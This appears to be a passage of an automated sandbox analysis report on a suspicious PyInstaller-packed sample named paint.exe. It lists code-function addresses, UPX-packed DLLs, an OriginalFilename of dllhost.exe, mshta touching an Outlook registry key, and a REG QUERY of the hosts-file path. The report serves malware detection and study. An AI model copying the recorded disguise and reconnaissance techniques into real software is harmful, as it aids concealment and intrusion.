              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0673361_2_00007FFDFB067336
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB1243201_2_00007FFDFB124320
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0631A51_2_00007FFDFB0631A5
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0721F01_2_00007FFDFB0721F0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0880B01_2_00007FFDFB0880B0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0870D01_2_00007FFDFB0870D0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0641201_2_00007FFDFB064120
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0D77D01_2_00007FFDFB0D77D0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0648201_2_00007FFDFB064820
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0736601_2_00007FFDFB073660
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0BE7001_2_00007FFDFB0BE700
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0C07501_2_00007FFDFB0C0750
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0645701_2_00007FFDFB064570
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0AA5A01_2_00007FFDFB0AA5A0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0846301_2_00007FFDFB084630
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0916301_2_00007FFDFB091630
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB08E6501_2_00007FFDFB08E650
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0BB6401_2_00007FFDFB0BB640
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB0694E01_2_00007FFDFB0694E0
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB1055101_2_00007FFDFB105510
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFDFB8922301_2_00007FFDFB892230
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFE007A5C001_2_00007FFE007A5C00
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFE00761D931_2_00007FFE00761D93
              Source: C:\Users\user\Desktop\paint.exeCode function: 1_2_00007FFE007616FE1_2_00007FFE007616FE
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE54C088_2_00007FF623DE54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DD82F088_2_00007FF623DD82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE118088_2_00007FF623DE1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DD188488_2_00007FF623DD1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DDB54088_2_00007FF623DDB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DDABA088_2_00007FF623DDABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E07B2488_2_00007FF623E07B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE0A2C88_2_00007FF623DE0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DFAE1088_2_00007FF623DFAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DDA50488_2_00007FF623DDA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E1546888_2_00007FF623E15468
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DFD45888_2_00007FF623DFD458
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DFC3E088_2_00007FF623DFC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE236088_2_00007FF623DE2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E0037488_2_00007FF623E00374
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E2832C88_2_00007FF623E2832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E2131488_2_00007FF623E21314
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DD42E088_2_00007FF623DD42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DED2C088_2_00007FF623DED2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E102A488_2_00007FF623E102A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E2226888_2_00007FF623E22268
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DF724488_2_00007FF623DF7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DDF24C88_2_00007FF623DDF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DEE21C88_2_00007FF623DEE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E341CC88_2_00007FF623E341CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E181CC88_2_00007FF623E181CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E1216488_2_00007FF623E12164
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E0D91C88_2_00007FF623E0D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E0090488_2_00007FF623E00904
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E1190C88_2_00007FF623E1190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E038E888_2_00007FF623E038E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E218A888_2_00007FF623E218A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DD888488_2_00007FF623DD8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE289088_2_00007FF623DE2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DF67E088_2_00007FF623DF67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE17C888_2_00007FF623DE17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E0A71088_2_00007FF623E0A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E1071088_2_00007FF623E10710
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E1270088_2_00007FF623E12700
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE86C488_2_00007FF623DE86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E386D488_2_00007FF623E386D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E2766088_2_00007FF623E27660
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E2260C88_2_00007FF623E2260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E065FC88_2_00007FF623E065FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE859888_2_00007FF623DE8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DFF5B088_2_00007FF623DFF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E0F59C88_2_00007FF623E0F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E00D2088_2_00007FF623E00D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DDDD0488_2_00007FF623DDDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E26D0C88_2_00007FF623E26D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DF9D0C88_2_00007FF623DF9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E15C8C88_2_00007FF623E15C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE8C3088_2_00007FF623DE8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E29B9888_2_00007FF623E29B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E14B3888_2_00007FF623E14B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DDCB1488_2_00007FF623DDCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E3AAC088_2_00007FF623E3AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E0FA6C88_2_00007FF623E0FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E15A7088_2_00007FF623E15A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E169FD88_2_00007FF623E169FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DD49B888_2_00007FF623DD49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DFD97C88_2_00007FF623DFD97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DF010488_2_00007FF623DF0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E300F088_2_00007FF623E300F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DFC05C88_2_00007FF623DFC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E0007488_2_00007FF623E00074
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E0804088_2_00007FF623E08040
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE303088_2_00007FF623DE3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E0C00C88_2_00007FF623E0C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E14FE888_2_00007FF623E14FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E3DFD888_2_00007FF623E3DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E3AF9088_2_00007FF623E3AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E05F4C88_2_00007FF623E05F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E0AF0C88_2_00007FF623E0AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DD9EFC88_2_00007FF623DD9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E1EEA488_2_00007FF623E1EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DDCE8488_2_00007FF623DDCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E2FE7488_2_00007FF623E2FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE8E6888_2_00007FF623DE8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E1AE5088_2_00007FF623E1AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DE1E0488_2_00007FF623DE1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DDEE0888_2_00007FF623DDEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E21DCC88_2_00007FF623E21DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E19D7488_2_00007FF623E19D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: String function: 00007FF623DE8444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: String function: 00007FF623E149F4 appears 53 times
              Source: C:\Users\user\Desktop\paint.exeCode function: String function: 00007FFE00761325 appears 85 times
              Source: C:\Users\user\Desktop\paint.exeCode function: String function: 00007FFDFB091EB0 appears 33 times
              Source: C:\Users\user\Desktop\paint.exeCode function: String function: 00007FF6F0BD2710 appears 104 times
              Source: C:\Users\user\Desktop\paint.exeCode function: String function: 00007FFDFB069350 appears 135 times
              Source: C:\Users\user\Desktop\paint.exeCode function: String function: 00007FFDFB06A510 appears 163 times
              Source: C:\Users\user\Desktop\paint.exeCode function: String function: 00007FFE007DD341 appears 203 times
              Source: C:\Users\user\Desktop\paint.exeCode function: String function: 00007FFE007DD32F appears 66 times
              Source: C:\Users\user\Desktop\paint.exeCode function: String function: 00007FF6F0BD2910 appears 34 times
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-debug-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-datetime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: paint.exeBinary or memory string: OriginalFilename vs paint.exe
              Source: paint.exe, 00000000.00000003.1668318561.0000023393148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1666390451.0000023393141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1666390451.0000023393141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs paint.exe
              Source: paint.exe, 00000000.00000003.1669986148.0000023393142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1667196677.0000023393141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1673399567.0000023393142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs paint.exe
              Source: paint.exe, 00000000.00000003.1666671701.0000023393141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1674120289.0000023393142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1669030963.0000023393148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1668921713.0000023393148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1666481364.0000023393141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1667816772.0000023393141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1669527787.0000023393149000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1670514489.0000023393149000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1669696117.0000023393142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1669915105.0000023393142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1669231918.0000023393147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1666577490.0000023393141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1667295052.0000023393141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1669359643.0000023393148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000000.1665110321.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedllhost.exej% vs paint.exe
              Source: paint.exe, 00000000.00000003.1668215242.0000023393148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1668000364.0000023393147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1667071030.0000023393141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs paint.exe
              Source: paint.exe, 00000000.00000003.1670060557.0000023393142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1668113578.0000023393148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1669443870.0000023393142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1674560991.0000023393142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs paint.exe
              Source: paint.exe, 00000000.00000003.1667653632.0000023393141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1668691836.0000023393148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1667479832.0000023393141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1668811885.0000023393148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1667896960.0000023393148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1667397043.0000023393141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1669612064.0000023393149000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1668427752.0000023393148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1669826746.0000023393149000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1673503521.0000023393142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs paint.exe
              Source: paint.exe, 00000000.00000003.1669134321.0000023393148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1670177591.0000023393142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exe, 00000000.00000003.1668542158.0000023393147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs paint.exe
              Source: paint.exeBinary or memory string: OriginalFilename vs paint.exe
              Source: paint.exe, 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs paint.exe
              Source: paint.exe, 00000001.00000002.2020135497.00007FFE13318000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs paint.exe
              Source: paint.exe, 00000001.00000002.2014972970.00007FFDFB02A000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs paint.exe
              Source: paint.exe, 00000001.00000002.2020811559.00007FFE1A46A000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs paint.exe
              Source: paint.exe, 00000001.00000002.2013801898.00007FFDFAB19000.00000004.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs paint.exe
              Source: paint.exe, 00000001.00000002.2019809610.00007FFE13224000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs paint.exe
              Source: paint.exe, 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedllhost.exej% vs paint.exe
              Source: paint.exe, 00000001.00000002.2018535219.00007FFE11EE3000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs paint.exe
              Source: paint.exe, 00000001.00000002.2019247215.00007FFE12E1C000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs paint.exe
              Source: paint.exe, 00000001.00000002.2017388273.00007FFE10262000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs paint.exe
              Source: paint.exe, 00000001.00000002.2017124172.00007FFE0146C000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs paint.exe
              Source: paint.exe, 00000001.00000002.2016893620.00007FFE00829000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibsslH vs paint.exe
              Source: paint.exe, 00000001.00000002.2016544721.00007FFDFB893000.00000004.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs paint.exe
              Source: paint.exe, 00000001.00000002.2019495511.00007FFE130CC000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs paint.exe
              Source: paint.exe, 00000001.00000002.2017652178.00007FFE11523000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs paint.exe
              Source: paint.exe, 00000001.00000002.2018259022.00007FFE11EB8000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs paint.exe
              Source: paint.exe, 00000001.00000002.2018980881.00007FFE126FB000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs paint.exe
              Source: paint.exeBinary or memory string: OriginalFilenamedllhost.exej% vs paint.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Users\user\Desktop\paint.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\paint.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: paint.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9907060274767802
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
              Source: python312.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993778722426471
